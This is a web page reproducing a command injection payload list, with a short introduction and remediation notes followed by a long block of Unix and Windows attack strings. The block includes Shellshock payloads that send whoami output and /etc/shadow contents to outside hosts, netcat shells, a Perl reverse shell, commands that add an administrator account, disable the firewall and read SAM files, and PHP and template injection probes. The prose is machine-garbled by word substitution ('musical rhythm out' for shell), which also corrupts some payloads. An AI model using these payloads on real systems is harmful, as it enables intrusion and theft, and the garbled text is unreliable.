Command Injection Payload List
Command injection is an assault inwards which the destination is execution of arbitrary commands on the host operating scheme via a vulnerable application. Command injection attacks are possible when an application passes dangerous user supplied information (forms, cookies, HTTP headers etc.) to a scheme shell. In this attack, the attacker-supplied operating scheme commands are commonly executed alongside the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
This assault differs from Code Injection, inwards that code injection allows the aggressor to add together his ain code that is as well as hence executed past times the application. In Command Injection, the aggressor extends the default functionality of the application, which execute scheme commands, without the necessity of injecting code.
What is OS command injection?
OS command Injection is a critical vulnerability that allows attackers to gain consummate command over an affected spider web site as well as the underlying spider web server.
OS command injection vulnerabilities arise when an application incorporates user information into an operating scheme command that it executes. An aggressor tin manipulate the information to displace their ain commands to run. This allows the aggressor to deport out whatsoever activity that the application itself tin deport out, including reading or modifying all of its information as well as performing privileged actions.
In add-on to full compromise of the spider web server itself, an aggressor tin leverage a command injection vulnerability to pin the assault inwards the organization's internal infrastructure, potentially accessing whatsoever scheme which the spider web server tin access. They may besides live on able to practise a persistent foothold inside the organization, continuing to access compromised systems fifty-fifty later the master vulnerability has been fixed.
Description :
Operating scheme command injection vulnerabilities arise when an application incorporates user-controllable information into a command that is processed past times a musical rhythm out command interpreter. If the user information is non strictly validated, an aggressor tin usage musical rhythm out metacharacters to modify the command that is executed, as well as inject arbitrary farther commands that volition live on executed past times the server.
OS command injection vulnerabilities are commonly rattling serious as well as may Pb to compromise of the server hosting the application, or of the application's ain information as well as functionality. It may besides live on possible to usage the server every bit a platform for attacks against other systems. The exact potential for exploitation depends upon the safety context inwards which the command is executed, as well as the privileges that this context has regarding sensitive resources on the server.
Remediation:
If possible, applications should avoid incorporating user-controllable information into operating scheme commands. In near every situation, at that spot are safer choice methods of performing server-level tasks, which cannot live on manipulated to perform additional commands than the 1 intended.
If it is considered unavoidable to comprise user-supplied information into operating scheme commands, the next 2 layers of defence forcefulness should live on used to preclude attacks:
- The user information should live on strictly validated. Ideally, a whitelist of specific accepted values should live on used. Otherwise, entirely brusque alphanumeric strings should live on accepted. Input containing whatsoever other data, including whatsoever conceivable musical rhythm out metacharacter or whitespace, should live on rejected.
- The application should usage command APIs that launch a specific procedure via its cite as well as command-line parameters, rather than passing a command string to a musical rhythm out interpreter that supports command chaining as well as redirection. For example, the Java API Runtime.exec as well as the ASP.NET API Process.Start practise non back upward musical rhythm out metacharacters. This defence forcefulness tin mitigate
Unix :
/index.html|id| ;id; ;id ;netstat -a; ;id; |id |/usr/bin/id |id| |/usr/bin/id| ||/usr/bin/id| |id; ||/usr/bin/id; ;id| ;|/usr/bin/id| \n/bin/ls -al\n \n/usr/bin/id\n \nid\n \n/usr/bin/id; \nid; \n/usr/bin/id| \nid| ;/usr/bin/id\n ;id\n |usr/bin/id\n |nid\n `id` `/usr/bin/id` a);id a;id a);id; a;id; a);id| a;id| a)|id a|id a)|id; a|id |/bin/ls -al a);/usr/bin/id a;/usr/bin/id a);/usr/bin/id; a;/usr/bin/id; a);/usr/bin/id| a;/usr/bin/id| a)|/usr/bin/id a|/usr/bin/id a)|/usr/bin/id; a|/usr/bin/id ;system('cat%20/etc/passwd') ;system('id') ;system('/usr/bin/id') %0Acat%20/etc/passwd %0A/usr/bin/id %0Aid %0A/usr/bin/id%0A %0Aid%0A & ping -i thirty 127.0.0.1 & & ping -n thirty 127.0.0.1 & %0a ping -i thirty 127.0.0.1 %0a `ping 127.0.0.1` | id & id ; id %0a id %0a `id` $;/usr/bin/id
Windows :
` || | ; ' '" " "' & && %0a %0a%0d %0Acat%20/etc/passwd %0Aid %0a id %0a %0Aid%0A %0a ping -i thirty 127.0.0.1 %0a %0A/usr/bin/id %0A/usr/bin/id%0A %2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 %20{${phpinfo()}} %20{${sleep(20)}} %20{${sleep(3)}} a|id| a;id| a;id; a;id\n () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5" () { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6" () { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1" () { :;}; /bin/bash -c "sleep three && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7" () { :;}; /bin/bash -c "sleep three && echo vulnerable 3" () { :;}; /bin/bash -c "sleep half dozen && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8" () { :;}; /bin/bash -c "sleep half dozen && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9" () { :;}; /bin/bash -c "sleep half dozen && echo vulnerable 6" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4" truthful cat /etc/hosts $(`cat /etc/passwd`) truthful cat /etc/passwd () { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12 | curl http://crowdshield.com/.testing/rce.txt & curl http://crowdshield.com/.testing/rce.txt ; curl https://crowdshield.com/.testing/rce_vuln.txt && curl https://crowdshield.com/.testing/rce_vuln.txt curl https://crowdshield.com/.testing/rce_vuln.txt curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt $(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) dir | dir ; dir $(`dir`) & dir &&dir && dir | dir C:\ ; dir C:\ & dir C:\ && dir C:\ dir C:\ | dir C:\Documents as well as Settings\* ; dir C:\Documents as well as Settings\* & dir C:\Documents as well as Settings\* && dir C:\Documents as well as Settings\* dir C:\Documents as well as Settings\* | dir C:\Users ; dir C:\Users & dir C:\Users && dir C:\Users dir C:\Users ;echo%20'' echo ''// XXXXXXXXXXX | echo "" > rfi.php ; echo "" > rfi.php & echo "" > rfi.php && echo "" > rfi.php echo "" > rfi.php | echo "" > dir.php ; echo "" > dir.php & echo "" > dir.php && echo "" > dir.php echo "" > dir.php | echo "" > cmd.php ; echo "" > cmd.php & echo "" > cmd.php && echo "" > cmd.php echo "" > cmd.php ;echo '' echo ''// XXXXXXXXXXX echo ''// XXXXXXXXXXX | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl ; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl & echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl && echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl () { :;}; echo vulnerable 10 eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') eval('ls') eval('pwd') eval('pwd'); eval('sleep 5') eval('sleep 5'); eval('whoami') eval('whoami'); exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') exec('ls') exec('pwd') exec('pwd'); exec('sleep 5') exec('sleep 5'); exec('whoami') exec('whoami'); ;{$_GET["cmd"]} `id` |id | id ;id ;id| ;id; & id &&id ;id\n ifconfig | ifconfig ; ifconfig & ifconfig && ifconfig /index.html|id| ipconfig | ipconfig /all ; ipconfig /all & ipconfig /all && ipconfig /all ipconfig /all ls $(`ls`) | ls -l / ; ls -l / & ls -l / && ls -l / ls -l / | ls -laR /etc ; ls -laR /etc & ls -laR /etc && ls -laR /etc | ls -laR /var/www ; ls -laR /var/www & ls -laR /var/www && ls -laR /var/www | ls -l /etc/ ; ls -l /etc/ & ls -l /etc/ && ls -l /etc/ ls -l /etc/ ls -lh /etc/ | ls -l /home/* ; ls -l /home/* & ls -l /home/* && ls -l /home/* ls -l /home/* *; ls -lhtR /var/www/ | ls -l /tmp ; ls -l /tmp & ls -l /tmp && ls -l /tmp ls -l /tmp | ls -l /var/www/* ; ls -l /var/www/* & ls -l /var/www/* && ls -l /var/www/* ls -l /var/www/* \n \n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\` \n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\` \n/bin/ls -al\n | nc -lvvp 4444 -e /bin/sh| ; nc -lvvp 4444 -e /bin/sh; & nc -lvvp 4444 -e /bin/sh& && nc -lvvp 4444 -e /bin/sh & nc -lvvp 4444 -e /bin/sh nc -lvvp 4445 -e /bin/sh & nc -lvvp 4446 -e /bin/sh| nc -lvvp 4447 -e /bin/sh; nc -lvvp 4448 -e /bin/sh& \necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n \necho INJECTX\nexit\n\033[2Asleep 5\n \necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n | cyberspace localgroup Administrators hacker /ADD ; cyberspace localgroup Administrators hacker /ADD & cyberspace localgroup Administrators hacker /ADD && cyberspace localgroup Administrators hacker /ADD cyberspace localgroup Administrators hacker /ADD | netsh firewall laid opmode disable ; netsh firewall laid opmode disable & netsh firewall laid opmode disable && netsh firewall laid opmode disable netsh firewall laid opmode disable netstat ;netstat -a; | netstat -an ; netstat -an & netstat -an && netstat -an netstat -an | cyberspace user hacker Password1 /ADD ; cyberspace user hacker Password1 /ADD & cyberspace user hacker Password1 /ADD && cyberspace user hacker Password1 /ADD cyberspace user hacker Password1 /ADD | cyberspace thought ; cyberspace thought & cyberspace thought && cyberspace thought cyberspace thought \nid| \nid; \nid\n \n/usr/bin/id\n perl -e 'print "X"x1024' || perl -e 'print "X"x16096' | perl -e 'print "X"x16096' ; perl -e 'print "X"x16096' & perl -e 'print "X"x16096' && perl -e 'print "X"x16096' perl -e 'print "X"x16384' ; perl -e 'print "X"x2048' & perl -e 'print "X"x2048' && perl -e 'print "X"x2048' perl -e 'print "X"x2048' || perl -e 'print "X"x4096' | perl -e 'print "X"x4096' ; perl -e 'print "X"x4096' & perl -e 'print "X"x4096' && perl -e 'print "X"x4096' perl -e 'print "X"x4096' || perl -e 'print "X"x8096' | perl -e 'print "X"x8096' ; perl -e 'print "X"x8096' && perl -e 'print "X"x8096' perl -e 'print "X"x8192' perl -e 'print "X"x81920' || phpinfo() | phpinfo() {${phpinfo()}} ;phpinfo() ;phpinfo();// ';phpinfo();// {${phpinfo()}} & phpinfo() && phpinfo() phpinfo() phpinfo(); :phpversion(); `ping 127.0.0.1` & ping -i thirty 127.0.0.1 & & ping -n thirty 127.0.0.1 & ;${@print(md5(RCEVulnerable))}; ${@print("RCEVulnerable")} ${@print(system($_SERVER['HTTP_USER_AGENT']))} pwd | pwd ; pwd & pwd && pwd \r | reg add together "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ; reg add together "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add together "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add together "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add together "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f \r\n road | slumber 1 ; slumber 1 & slumber 1 && slumber 1 slumber 1 || slumber 10 | slumber 10 ; slumber 10 {${sleep(10)}} & slumber 10 && slumber 10 slumber 10 || slumber fifteen | slumber fifteen ; slumber fifteen & slumber fifteen && slumber fifteen {${sleep(20)}} {${sleep(20)}} {${sleep(3)}} {${sleep(3)}} | slumber v ; slumber v & slumber v && slumber v slumber v {${sleep(hexdec(dechex(20)))}} {${sleep(hexdec(dechex(20)))}} sysinfo | sysinfo ; sysinfo & sysinfo && sysinfo ;system('cat%20/etc/passwd') system('cat C:\boot.ini'); system('cat config.php'); system('cat /etc/passwd'); || system('curl https://crowdshield.com/.testing/rce_vuln.txt'); | system('curl https://crowdshield.com/.testing/rce_vuln.txt'); ; system('curl https://crowdshield.com/.testing/rce_vuln.txt'); & system('curl https://crowdshield.com/.testing/rce_vuln.txt'); && system('curl https://crowdshield.com/.testing/rce_vuln.txt'); system('curl https://crowdshield.com/.testing/rce_vuln.txt') system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf') system('curl https://xerosecurity.com/.testing/rce_vuln.txt'); system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') systeminfo | systeminfo ; systeminfo & systeminfo && systeminfo system('ls') system('pwd') system('pwd'); || system('sleep 5'); | system('sleep 5'); ; system('sleep 5'); & system('sleep 5'); && system('sleep 5'); system('sleep 5') system('sleep 5'); system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23') system('wget https://xerosecurity.com/.testing/rce_vuln.txt'); system('whoami') system('whoami'); test*; ls -lhtR /var/www/ test* || perl -e 'print "X"x16096' test* | perl -e 'print "X"x16096' test* & perl -e 'print "X"x16096' test* && perl -e 'print "X"x16096' test*; perl -e 'print "X"x16096' $(`type C:\boot.ini`) &&type C:\\boot.ini | type C:\Windows\repair\SAM ; type C:\Windows\repair\SAM & type C:\Windows\repair\SAM && type C:\Windows\repair\SAM type C:\Windows\repair\SAM | type C:\Windows\repair\SYSTEM ; type C:\Windows\repair\SYSTEM & type C:\Windows\repair\SYSTEM && type C:\Windows\repair\SYSTEM type C:\Windows\repair\SYSTEM | type C:\WINNT\repair\SAM ; type C:\WINNT\repair\SAM & type C:\WINNT\repair\SAM && type C:\WINNT\repair\SAM type C:\WINNT\repair\SAM type C:\WINNT\repair\SYSTEM | type %SYSTEMROOT%\repair\SAM ; type %SYSTEMROOT%\repair\SAM & type %SYSTEMROOT%\repair\SAM && type %SYSTEMROOT%\repair\SAM type %SYSTEMROOT%\repair\SAM | type %SYSTEMROOT%\repair\SYSTEM ; type %SYSTEMROOT%\repair\SYSTEM & type %SYSTEMROOT%\repair\SYSTEM && type %SYSTEMROOT%\repair\SYSTEM type %SYSTEMROOT%\repair\SYSTEM uname ;uname; | uname -a ; uname -a & uname -a && uname -a uname -a |/usr/bin/id ;|/usr/bin/id| ;/usr/bin/id| $;/usr/bin/id () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");' () { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11 | wget http://crowdshield.com/.testing/rce.txt & wget http://crowdshield.com/.testing/rce.txt ; wget https://crowdshield.com/.testing/rce_vuln.txt $(`wget https://crowdshield.com/.testing/rce_vuln.txt`) && wget https://crowdshield.com/.testing/rce_vuln.txt wget https://crowdshield.com/.testing/rce_vuln.txt $(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) which curl which gcc which nc which netcat which perl which python which wget whoami | whoami ; whoami ' whoami ' || whoami ' & whoami ' && whoami '; whoami " whoami " || whoami " | whoami " & whoami " && whoami "; whoami $(`whoami`) & whoami && whoami {{ get_user_file("C:\boot.ini") }} {{ get_user_file("/etc/hosts") }} {{ get_user_file("/etc/passwd") }} {{4+4}} {{4+8}} {{person.secret}} {{person.name}} {1} + {1} {% For c inwards [1,2,3]%} {{c, c, c}} {% endfor%} {{[] .__ Class __.__ base of operations __.__ subclasses __ ()}}
References :
Testing for Command Injection (OTG-INPVAL-013)
OWASP Command Injection
WE-77: Improper Neutralization of Special Elements used inwards a Command ('Command Injection')
WE-78: Improper Neutralization of Special Elements used inwards an OS Command ('OS Command Injection'
Portswigger Web Security - OS Command Injection
Cloning an Existing Repository ( Clone alongside HTTPS )
root@ismailtasdelen: # git clone https://github.com/ismailtasdelen/command-injection-payload-list.git
Cloning an Existing Repository ( Clone alongside SSH )
root@ismailtasdelen: # git clone git@github.com:ismailtasdelen/command-injection-payload-list.git